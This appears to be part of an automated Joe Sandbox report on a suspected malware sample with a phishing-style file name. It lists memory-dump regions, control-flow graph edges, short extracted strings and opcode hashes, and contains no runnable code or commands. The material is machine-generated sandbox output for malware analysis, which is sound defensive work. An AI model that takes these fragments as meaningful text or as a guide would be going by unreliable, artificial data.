                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 3340ffeb2922667babc29a444d22793c9b65d89e2a60005c3a58ea535fec51e1
                                                                                                                                                    • Instruction ID: 40c0d5f1c3c3d4be7c8096072ae14681d15ccc97e4f693e8207cc755920cb827
                                                                                                                                                    • Opcode Fuzzy Hash: 3340ffeb2922667babc29a444d22793c9b65d89e2a60005c3a58ea535fec51e1
                                                                                                                                                    • Instruction Fuzzy Hash: 23617230A08204CFDB14EB95E965BEAB7B3FB88305F28C169D4015B399C7759DC5CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 781 7ddbb0-7ddbc6 782 7ddbc8-7ddbce 781->782 783 7ddc02-7ddc27 781->783 784 7ddc2e-7ddc6c 782->784 785 7ddbd0-7ddbd8 782->785 783->784 799 7ddc7c-7ddce0 784->799 800 7ddc6f-7ddc7b 784->800 787 7ddbda 785->787 788 7ddbe4-7ddbff 785->788 787->788 802 7ddcee-7ddd5a 799->802 803 7ddce2-7ddce4 799->803 800->799 813 7ddd5c-7ddd5e 802->813 814 7ddd68-7ddd87 802->814 803->802 813->814 818 7ddd8d-7ddd9a 814->818 819 7de21b-7de246 814->819 820 7ddd9c-7ddda9 818->820 821 7dddab 818->821 824 7de24d-7de289 819->824 823 7dddad-7dddaf 820->823 821->823 823->824 825 7dddb5-7dddd6 823->825 841 7de290-7de2bb 824->841 830 7ddddc-7dde16 825->830 831 7dde64-7dded6 825->831 839 7dde18-7dde28 830->839 840 7dde2a-7dde37 830->840 845 7ddee9 831->845 846 7dded8-7ddee7 831->846 848 7dde39-7dde3d 839->848 840->848 870 7de2c2-7de30d 841->870 849 7ddeeb-7ddeed 845->849 846->849 853 7dde3f-7dde41 848->853 854 7dde43 848->854 855 7ddeef-7ddf1d 849->855 856 7ddf25-7ddf31 849->856 859 7dde4b-7dde5d 853->859 854->859 855->856 857 7ddf71-7ddf88 856->857 858 7ddf33-7ddf38 856->858 869 7ddf8e 857->869 857->870 944 7ddf3b call 7de328 858->944 945 7ddf3b call 7ddbb0 858->945 946 7ddf3b call 7ddcb0 858->946 859->831 863 7ddf3d-7ddf49 863->841 871 7ddf4f-7ddfc7 863->871 869->871 884 7de31c-7de341 870->884 885 7de30f-7de315 870->885 890 7ddfce-7ddfef 871->890 886 7de34d-7de36a 884->886 887 7de343 884->887 891 7de36c 886->891 892 7de376-7de386 886->892 887->886 898 7ddff9-7ddffd 890->898 899 7ddff1 890->899 891->892 896 7de38e-7de395 892->896 900 7ddfff-7de012 898->900 901 7de017-7de03e 898->901 899->898 902 7de095-7de0cc 900->902 910 7de048-7de086 901->910 911 7de040 901->911 907 7de10c-7de113 902->907 908 7de0ce-7de107 902->908 912 7de115-7de124 907->912 913 7de133-7de13a 907->913 908->907 935 7de088 910->935 936 7de090 910->936 911->910 912->913 922 7de126-7de12c 912->922 914 7de13c-7de14c 913->914 915 7de14e-7de154 913->915 920 7de15e-7de160 914->920 915->920 924 7de16a-7de18c 920->924 925 7de162 920->925 922->913 930 7de18e-7de198 924->930 931 7de1e3 924->931 925->924 932 7de1ac-7de1b9 930->932 933 7de19a-7de1aa 930->933 931->819 939 7de1bb-7de1bf 932->939 933->939 935->936 936->902 941 7de1c5 939->941 942 7de1c1-7de1c3 939->942 943 7de1cd-7de1dc 941->943 942->943 943->931 944->863 945->863 946->863
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: Hp$(p$PHp$PHp$h~$p
                                                                                                                                                    • API String ID: 0-1182827755
                                                                                                                                                    • Opcode ID: 254443b31bd5f2e68b2d06c954648c38a25bc9128da257b385084f1fefdf1582
                                                                                                                                                    • Instruction ID: cad0aea5e4cfac0accc57f3b35e554c07b02d0dfac5a8efdaecc7d60969fccdc
                                                                                                                                                    • Opcode Fuzzy Hash: 254443b31bd5f2e68b2d06c954648c38a25bc9128da257b385084f1fefdf1582
                                                                                                                                                    • Instruction Fuzzy Hash: 3032A130B007458FC725DB78C450BAEBBB2AF89314F24896ED4069B396DB75EC46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 947 60ad80-60ada8 949 60adf6-60ae04 947->949 950 60adaa-60adf1 947->950 951 60ae13 949->951 952 60ae06-60ae11 call 607d08 949->952 1005 60b24d-60b254 950->1005 955 60ae15-60ae1c 951->955 952->955 957 60ae22-60ae26 955->957 958 60af05-60af09 955->958 959 60b255-60b27d 957->959 960 60ae2c-60ae30 957->960 962 60af0b-60af1a call 605ec0 958->962 963 60af5f-60af69 958->963 969 60b284-60b2ae 959->969 964 60ae42-60aea0 call 607a48 call 6084b0 960->964 965 60ae32-60ae3c 960->965 978 60af1e-60af23 962->978 966 60afa2-60afc8 963->966 967 60af6b-60af7a call 605668 963->967 1010 60b313-60b33d 964->1010 1011 60aea6-60af00 964->1011 965->964 965->969 989 60afd5 966->989 990 60afca-60afd3 966->990 982 60af80-60af9d 967->982 983 60b2b6-60b2cc 967->983 969->983 984 60af25-60af5a call 60a848 978->984 985 60af1c 978->985 982->1005 1008 60b2d4-60b30c 983->1008 984->1005 985->978 997 60afd7-60afff 989->997 990->997 1014 60b0d0-60b0d4 997->1014 1015 60b005-60b01e 997->1015 1008->1010 1020 60b347-60b34d 1010->1020 1021 60b33f-60b345 1010->1021 1011->1005 1018 60b0d6-60b0ef 1014->1018 1019 60b14e-60b158 1014->1019 1015->1014 1042 60b024-60b033 call 605600 1015->1042 1018->1019 1046 60b0f1-60b100 call 605600 1018->1046 1024 60b1b5-60b1be 1019->1024 1025 60b15a-60b164 1019->1025 1021->1020 1022 60b34e-60b38b 1021->1022 1029 60b1c0-60b1ee call 607240 call 607260 1024->1029 1030 60b1f6-60b243 1024->1030 1040 60b166-60b168 1025->1040 1041 60b16a-60b17c 1025->1041 1029->1030 1053 60b24b 1030->1053 1047 60b17e-60b180 1040->1047 1041->1047 1056 60b035-60b03b 1042->1056 1057 60b04b-60b060 1042->1057 1071 60b102-60b108 1046->1071 1072 60b118-60b123 1046->1072 1051 60b182-60b186 1047->1051 1052 60b1ae-60b1b3 1047->1052 1060 60b1a4-60b1a9 call 604400 1051->1060 1061 60b188-60b1a1 1051->1061 1052->1024 1052->1025 1053->1005 1064 60b03d 1056->1064 1065 60b03f-60b041 1056->1065 1068 60b062-60b08e call 606390 1057->1068 1069 60b094-60b09d 1057->1069 1060->1052 1061->1060 1064->1057 1065->1057 1068->1008 1068->1069 1069->1010 1077 60b0a3-60b0ab 1069->1077 1078 60b10a 1071->1078 1079 60b10c-60b10e 1071->1079 1072->1010 1073 60b129-60b14c 1072->1073 1073->1019 1073->1046 1083 60b0b3-60b0ca 1077->1083 1078->1072 1079->1072 1083->1014 1083->1042
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: ,DR$Hp$Hp$Hp$LER
                                                                                                                                                    • API String ID: 0-1093185528
                                                                                                                                                    • Opcode ID: 8ff5c5a88d332ffbace57a14921006830ab6cf9e3e1d03e69f68b3a789200ed2
                                                                                                                                                    • Instruction ID: 6fbe3b877cd19cb5145b9d68054b71a241422c3b35942ac3d35f9da0d441520e
                                                                                                                                                    • Opcode Fuzzy Hash: 8ff5c5a88d332ffbace57a14921006830ab6cf9e3e1d03e69f68b3a789200ed2
                                                                                                                                                    • Instruction Fuzzy Hash: 5D125F31A007059FCB29DFA4D854AAEBBF2FF89300B14856DE4069B395DB31ED46CB51
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1090 61095f-610980 1091 610986-61098a 1090->1091 1092 610a99-610abe 1090->1092 1093 610990-610999 1091->1093 1094 610ac5-610aea 1091->1094 1092->1094 1095 610af1-610b27 1093->1095 1096 61099f-6109c6 1093->1096 1094->1095 1113 610b2e-610b84 1095->1113 1106 6109cc-6109ce 1096->1106 1107 610a8e-610a98 1096->1107 1110 6109d0-6109d3 1106->1110 1111 6109ef-6109f1 1106->1111 1112 6109d9-6109e3 1110->1112 1110->1113 1114 6109f4-6109f8 1111->1114 1112->1113 1116 6109e9-6109ed 1112->1116 1128 610b86-610b9a call 610e38 1113->1128 1129 610ba8-610bbf 1113->1129 1117 610a59-610a65 1114->1117 1118 6109fa-610a09 1114->1118 1116->1111 1116->1114 1117->1113 1119 610a6b-610a88 1117->1119 1118->1113 1124 610a0f-610a56 1118->1124 1119->1106 1119->1107 1124->1117 1185 610b9d call 6111e0 1128->1185 1186 610b9d call 611158 1128->1186 1138 610bc5-610caa 1129->1138 1139 610caf-610cbf 1129->1139 1134 610ba3 1136 610dd1-610ddc 1134->1136 1144 610e0b-610e2c 1136->1144 1145 610dde-610dee 1136->1145 1138->1139 1146 610cc5-610d9e 1139->1146 1147 610dac-610dc8 1139->1147 1153 610df0-610df6 1145->1153 1154 610dfe-610e04 1145->1154 1182 610da0 1146->1182 1183 610da9 1146->1183 1147->1136 1153->1154 1154->1144 1182->1183 1183->1147 1185->1134 1186->1134
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p$,DR$,DR$Hp
                                                                                                                                                    • API String ID: 0-2723858098
                                                                                                                                                    • Opcode ID: e721490977d57e82f927a59daf252f1e11531dc60d4aa55df59ea2065d8d4a25
                                                                                                                                                    • Instruction ID: cab461bace3af826199b94d6d0864d5b84cf2316d9104961d4d59a386227c26d
                                                                                                                                                    • Opcode Fuzzy Hash: e721490977d57e82f927a59daf252f1e11531dc60d4aa55df59ea2065d8d4a25
                                                                                                                                                    • Instruction Fuzzy Hash: CCF14234A00209DFCB19DF64E4959DEBBB2FF89300F158569E405AB3A5DB30EC86CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1188 617f30-617f69 1191 617f6b-617f77 1188->1191 1192 617fdf-618004 1188->1192 1195 61800b-618070 1191->1195 1196 617f7d-617f93 1191->1196 1192->1195 1213 618072-618074 1195->1213 1214 618098-6180a6 1195->1214 1203 617f95-617fa4 1196->1203 1204 617fa6-617fc2 1196->1204 1203->1204 1211 617fc4-617fca 1204->1211 1212 617fcc 1204->1212 1215 617fd0-617fdc 1211->1215 1212->1215 1216 618113-618138 1213->1216 1217 61807a-61807f 1213->1217 1224 6180a8-6180b6 1214->1224 1225 6180db-6180e6 1214->1225 1223 61813f-618163 1216->1223 1218 618081-618083 1217->1218 1219 618089-618095 1217->1219 1218->1219 1218->1223 1235 61816a-6181bd 1223->1235 1233 6180b8-6180c9 call 6118a0 1224->1233 1234 6180cc-6180ce 1224->1234 1231 6180d4-6180d8 1225->1231 1232 6180e8-61810c 1225->1232 1232->1216 1234->1231 1234->1235 1248 618218-61826a 1235->1248 1249 6181bf-6181d5 1235->1249 1263 618282-61829a 1248->1263 1264 61826c-618272 1248->1264 1254 6181d7-6181e2 call 61829f 1249->1254 1255 6181ed-618205 1249->1255 1258 6181e5-6181ea 1254->1258 1259 618210-618215 1255->1259 1260 618207 1255->1260 1260->1259 1265 618274 1264->1265 1266 618276-618278 1264->1266 1265->1263 1266->1263
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$(p$(p$8xR$Hp
                                                                                                                                                    • API String ID: 0-647865385
                                                                                                                                                    • Opcode ID: 87caf3ba1078b5a2a07a4fa7fb6f9ec972e3c142bab9024fdf707db251e28ab6
                                                                                                                                                    • Instruction ID: e9ab877062df625116f7ec5b97a886b616f5227a0af081d0f8325e58257f141e
                                                                                                                                                    • Opcode Fuzzy Hash: 87caf3ba1078b5a2a07a4fa7fb6f9ec972e3c142bab9024fdf707db251e28ab6
                                                                                                                                                    • Instruction Fuzzy Hash: DB9114317047105FC7169B38A860AAF7FA3DFD6310B18856AE409CB396DE34DD0B87A6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1270 4dcf6a8-4dcf6c8 1271 4dcf6ce-4dcf82d call 7dfcc0 1270->1271 1272 4dcfdb1-4dcfde5 1270->1272 1442 4dcf82f call b21968 1271->1442 1443 4dcf82f call b21948 1271->1443 1444 4dcf82f call b2191e 1271->1444 1313 4dcf835-4dcf850 1451 4dcf853 call b21cb0 1313->1451 1452 4dcf853 call b21c90 1313->1452 1453 4dcf853 call b21a88 1313->1453 1454 4dcf853 call b21a78 1313->1454 1455 4dcf853 call b21c7c 1313->1455 1316 4dcf859-4dcf85e 1317 4dcf876-4dcf8f6 KiUserExceptionDispatcher 1316->1317 1318 4dcf860-4dcf873 1316->1318 1445 4dcf8f8 call b22a80 1317->1445 1446 4dcf8f8 call b22a70 1317->1446 1447 4dcf8f8 call b22581 1317->1447 1448 4dcf8f8 call b225e7 1317->1448 1449 4dcf8f8 call b22784 1317->1449 1450 4dcf8f8 call b225be 1317->1450 1318->1317 1331 4dcf8fe-4dcf917 1456 4dcf919 call b22b60 1331->1456 1457 4dcf919 call b22b50 1331->1457 1334 4dcf91f-4dcf938 1458 4dcf93a call b22c80 1334->1458 1459 4dcf93a call b22c6f 1334->1459 1337 4dcf940-4dcf959 1437 4dcf95b call b22d80 1337->1437 1438 4dcf95b call b22d71 1337->1438 1340 4dcf961-4dcf964 1439 4dcf967 call b22e78 1340->1439 1440 4dcf967 call b22e69 1340->1440 1341 4dcf96d-4dcf988 1344 4dcf98e-4dcf9c8 1341->1344 1345 4dcfb54-4dcfb5b 1341->1345 1344->1345 1361 4dcf9ce-4dcf9ff 1344->1361 1346 4dcfb5d-4dcfb63 1345->1346 1347 4dcfb6b-4dcfb7a 1345->1347 1346->1347 1351 4dcfb7c-4dcfb84 1347->1351 1352 4dcfb8b-4dcfba1 1347->1352 1351->1352 1357 4dcfbc0-4dcfbce 1352->1357 1358 4dcfba3-4dcfbb8 1352->1358 1363 4dcfbde-4dcfbe5 1357->1363 1364 4dcfbd0-4dcfbd6 1357->1364 1358->1357 1361->1345 1378 4dcfa05-4dcfa09 1361->1378 1365 4dcfbf5-4dcfbfc 1363->1365 1366 4dcfbe7-4dcfbed 1363->1366 1364->1363 1368 4dcfc0c-4dcfc13 1365->1368 1369 4dcfbfe-4dcfc04 1365->1369 1366->1365 1370 4dcfc15-4dcfc1b 1368->1370 1371 4dcfc23-4dcfc32 1368->1371 1369->1368 1370->1371 1375 4dcfc34-4dcfc3c 1371->1375 1376 4dcfc43-4dcfc59 1371->1376 1375->1376 1384 4dcfc5b-4dcfc6a 1376->1384 1385 4dcfcd6-4dcfcf0 1376->1385 1380 4dcfa0b-4dcfa1f 1378->1380 1381 4dcfa22-4dcfaee 1378->1381 1380->1381 1381->1345 1384->1385 1391 4dcfc6c-4dcfc7b 1384->1391 1396 4dcfcfa-4dcfd0b 1385->1396 1391->1385 1397 4dcfc7d-4dcfc8c 1391->1397 1402 4dcfd0d-4dcfd25 1396->1402 1403 4dcfd2f-4dcfd41 1396->1403 1397->1385 1401 4dcfc8e-4dcfc9d 1397->1401 1401->1385 1409 4dcfc9f-4dcfcae 1401->1409 1402->1403 1405 4dcfd48-4dcfd88 1403->1405 1406 4dcfd43 1403->1406 1421 4dcfd8a 1405->1421 1422 4dcfd92 1405->1422 1406->1405 1409->1385 1416 4dcfcb0-4dcfcbf 1409->1416 1416->1385 1423 4dcfcc1-4dcfcd0 1416->1423 1421->1422 1425 4dcfd95-4dcfda9 1422->1425 1423->1385 1423->1425 1425->1272 1437->1340 1438->1340 1439->1341 1440->1341 1442->1313 1443->1313 1444->1313 1445->1331 1446->1331 1447->1331 1448->1331 1449->1331 1450->1331 1451->1316 1452->1316 1453->1316 1454->1316 1455->1316 1456->1334 1457->1334 1458->1337 1459->1337
                                                                                                                                                    APIs
                                                                                                                                                    • KiUserExceptionDispatcher.NTDLL ref: 04DCF8C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.433535704.0000000004DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04DC0000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_4dc0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: DispatcherExceptionUser
                                                                                                                                                    • String ID: L<r$Tep
                                                                                                                                                    • API String ID: 6842923-423740796
                                                                                                                                                    • Opcode ID: d8bb5438fa0fecd31824ecd97738d394452ec8ac8983ffc8b7a24cfdef4ca00f
                                                                                                                                                    • Instruction ID: 8af862d214b2c0214f91af1213be662a16f0c9d94768d53a409b63ef2671de07
                                                                                                                                                    • Opcode Fuzzy Hash: d8bb5438fa0fecd31824ecd97738d394452ec8ac8983ffc8b7a24cfdef4ca00f
                                                                                                                                                    • Instruction Fuzzy Hash: C0124830B102159FDB59EB78D5646ADBBE3AF88304B14892CE806DB395DF34ED46CB81
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1696 60c640-60c67d 1698 60c69f-60c6b5 call 60c448 1696->1698 1699 60c67f-60c682 1696->1699 1705 60ca2b-60ca3f 1698->1705 1706 60c6bb-60c6c7 1698->1706 1813 60c684 call 60cfb0 1699->1813 1814 60c684 call 60cf58 1699->1814 1815 60c684 call 60cf49 1699->1815 1702 60c68a-60c68c 1702->1698 1703 60c68e-60c696 1702->1703 1703->1698 1717 60ca7f-60ca88 1705->1717 1707 60c7f8-60c7ff 1706->1707 1708 60c6cd-60c6d0 1706->1708 1711 60c805-60c80e 1707->1711 1712 60c92e-60c968 call 60be50 1707->1712 1709 60c6d3-60c6dc 1708->1709 1715 60cb20 1709->1715 1716 60c6e2-60c6f6 1709->1716 1711->1712 1713 60c814-60c920 call 60be50 call 60c3e0 call 60be50 1711->1713 1809 60c96b call 60e528 1712->1809 1810 60c96b call 60e538 1712->1810 1807 60c922 1713->1807 1808 60c92b 1713->1808 1724 60cb25-60cb29 1715->1724 1733 60c7e8-60c7f2 1716->1733 1734 60c6fc-60c791 call 60c448 * 2 call 60be50 call 60c3e0 call 60c488 call 60c530 call 60c598 1716->1734 1718 60ca8a-60ca91 1717->1718 1719 60ca4d-60ca56 1717->1719 1722 60ca93-60cad6 call 60be50 1718->1722 1723 60cadf-60cae6 1718->1723 1719->1715 1726 60ca5c-60ca6e 1719->1726 1722->1723 1727 60cae8-60caf8 1723->1727 1728 60cb0b-60cb1e 1723->1728 1731 60cb34 1724->1731 1732 60cb2b 1724->1732 1743 60ca70-60ca75 1726->1743 1744 60ca7e 1726->1744 1727->1728 1745 60cafa-60cb02 1727->1745 1728->1724 1741 60cb35 1731->1741 1732->1731 1733->1707 1733->1709 1786 60c7b0-60c7e3 call 60c598 1734->1786 1787 60c793-60c7ab call 60c530 call 60be50 call 60c100 1734->1787 1741->1741 1811 60ca78 call 60ecc8 1743->1811 1812 60ca78 call 60ecd8 1743->1812 1744->1717 1745->1728 1754 60c971-60ca22 call 60be50 1754->1705 1786->1733 1787->1786 1807->1808 1808->1712 1809->1754 1810->1754 1811->1744 1812->1744 1813->1702 1814->1702 1815->1702
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: 4'p$4'p$4'p$@;R
                                                                                                                                                    • API String ID: 0-2204238800
                                                                                                                                                    • Opcode ID: 10c6b9130f39b3c85ff009fc8691e1c08acce227e3435e91f081f7ec024cf95e
                                                                                                                                                    • Instruction ID: b564b32dd4264ab1288957f433b1ad2381a9ed3c2bb2e93c018a1f3208cdcfb9
                                                                                                                                                    • Opcode Fuzzy Hash: 10c6b9130f39b3c85ff009fc8691e1c08acce227e3435e91f081f7ec024cf95e
                                                                                                                                                    • Instruction Fuzzy Hash: C1F1EB34B50218CFCB19DFA4D999A9EB7B2FF89310F118159E506AB3A5DB70EC46CB40
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1816 60a430-60a442 1817 60a444-60a465 1816->1817 1818 60a46c-60a470 1816->1818 1817->1818 1819 60a472-60a474 1818->1819 1820 60a47c-60a48b 1818->1820 1819->1820 1821 60a497-60a4c3 1820->1821 1822 60a48d 1820->1822 1826 60a6f0-60a737 1821->1826 1827 60a4c9-60a4cf 1821->1827 1822->1821 1858 60a739 1826->1858 1859 60a74d-60a759 1826->1859 1829 60a5a1-60a5a5 1827->1829 1830 60a4d5-60a4db 1827->1830 1831 60a5a7-60a5b0 1829->1831 1832 60a5c8-60a5d1 1829->1832 1830->1826 1834 60a4e1-60a4ee 1830->1834 1831->1826 1835 60a5b6-60a5c6 1831->1835 1836 60a5d3-60a5f3 1832->1836 1837 60a5f6-60a5f9 1832->1837 1838 60a580-60a589 1834->1838 1839 60a4f4-60a4fd 1834->1839 1841 60a5fc-60a602 1835->1841 1836->1837 1837->1841 1838->1826 1843 60a58f-60a59b 1838->1843 1839->1826 1840 60a503-60a51b 1839->1840 1844 60a527-60a539 1840->1844 1845 60a51d 1840->1845 1841->1826 1847 60a608-60a61b 1841->1847 1843->1829 1843->1830 1844->1838 1853 60a53b-60a541 1844->1853 1845->1844 1847->1826 1849 60a621-60a631 1847->1849 1849->1826 1852 60a637-60a644 1849->1852 1852->1826 1855 60a64a-60a65f 1852->1855 1856 60a543 1853->1856 1857 60a54d-60a553 1853->1857 1855->1826 1865 60a665-60a688 1855->1865 1856->1857 1857->1826 1862 60a559-60a57d 1857->1862 1863 60a73c-60a73e 1858->1863 1860 60a765-60a781 1859->1860 1861 60a75b 1859->1861 1861->1860 1866 60a740-60a74b 1863->1866 1867 60a782-60a7af call 605600 1863->1867 1865->1826 1872 60a68a-60a695 1865->1872 1866->1859 1866->1863 1878 60a7b1-60a7b7 1867->1878 1879 60a7c7-60a7c9 1867->1879 1875 60a6e6-60a6ed 1872->1875 1876 60a697-60a6a1 1872->1876 1876->1875 1884 60a6a3-60a6b9 1876->1884 1881 60a7b9 1878->1881 1882 60a7bb-60a7bd 1878->1882 1902 60a7cb call 60b9f2 1879->1902 1903 60a7cb call 60a848 1879->1903 1904 60a7cb call 60a839 1879->1904 1881->1879 1882->1879 1883 60a7d1-60a7d5 1885 60a820-60a830 1883->1885 1886 60a7d7-60a7ee 1883->1886 1890 60a6c5-60a6de 1884->1890 1891 60a6bb 1884->1891 1886->1885 1894 60a7f0-60a7fa 1886->1894 1890->1875 1891->1890 1897 60a7fc-60a80b 1894->1897 1898 60a80d-60a81d 1894->1898 1897->1898 1902->1883 1903->1883 1904->1883
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$8xR$8xR$d
                                                                                                                                                    • API String ID: 0-3719587894
                                                                                                                                                    • Opcode ID: 6f131e8fda3a6f74f813cf81ad5ed03e5853f5ea223cda4ae139b86e9182fdea
                                                                                                                                                    • Instruction ID: 154166324d1fde43e2083543916116233da6d10770d98a2ba64f55daf86f94c5
                                                                                                                                                    • Opcode Fuzzy Hash: 6f131e8fda3a6f74f813cf81ad5ed03e5853f5ea223cda4ae139b86e9182fdea
                                                                                                                                                    • Instruction Fuzzy Hash: 4AD16C346407018FCB19CF58C4849AABBF2FF89350B16C969D45A9B7A2DB31FC46CB91
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1905 605cb1-605cbd 1906 605d11-605d24 1905->1906 1907 605cbf-605cd2 1905->1907 1914 605e48-605ecd call 602a48 1906->1914 1915 605d2a-605d2f 1906->1915 1908 605dc6-605deb 1907->1908 1909 605cd8-605cda 1907->1909 1912 605df2-605e16 1908->1912 1911 605ce0-605cec 1909->1911 1909->1912 1918 605d00-605d10 1911->1918 1919 605cee-605cfa 1911->1919 1930 605e1d-605e41 1912->1930 1951 605ed2-605ee0 call 605600 1914->1951 1960 605d31 call 605ec0 1915->1960 1961 605d31 call 605cb1 1915->1961 1918->1906 1918->1930 1919->1918 1919->1930 1921 605d37-605d80 1944 605d82-605d9b 1921->1944 1945 605da3-605dc3 call 604400 1921->1945 1930->1914 1944->1945 1956 605ee2-605ee8 1951->1956 1957 605ef8-605efa 1951->1957 1958 605eea 1956->1958 1959 605eec-605eee 1956->1959 1958->1957 1959->1957 1960->1921 1961->1921
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID: (p$,DR$8xR$Hp
                                                                                                                                                    • API String ID: 0-567276277
                                                                                                                                                    • Opcode ID: 4b8acfd6619daef38f269cb4ae3a11aaa2a777aeea61af5c17a8fcfb80e6a78e
                                                                                                                                                    • Instruction ID: ffbc9eecfb9a596ad41ba42cff2373ab3822f2dab683f0894793dbdbf8135c2d
                                                                                                                                                    • Opcode Fuzzy Hash: 4b8acfd6619daef38f269cb4ae3a11aaa2a777aeea61af5c17a8fcfb80e6a78e
                                                                                                                                                    • Instruction Fuzzy Hash: DC61AE307447118FC729AB68D82466F7BA3AF96310724446EE406CB3E2CE35DC47CB92
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
